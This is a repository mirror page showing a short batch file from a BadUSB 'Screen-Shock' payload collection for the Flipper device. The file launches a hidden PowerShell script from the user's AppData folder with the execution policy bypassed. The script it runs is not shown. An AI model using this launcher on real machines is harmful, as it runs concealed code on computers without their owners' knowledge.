1
0
mirror of https://github.com/UberGuidoZ/Flipper.git synced 2025-01-01 11:20:12 +00:00
Flipper/BadUSB/Screen-Shock/I.bat
2022-09-17 16:03:33 -04:00

4 lines
136 B
Batchfile

@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause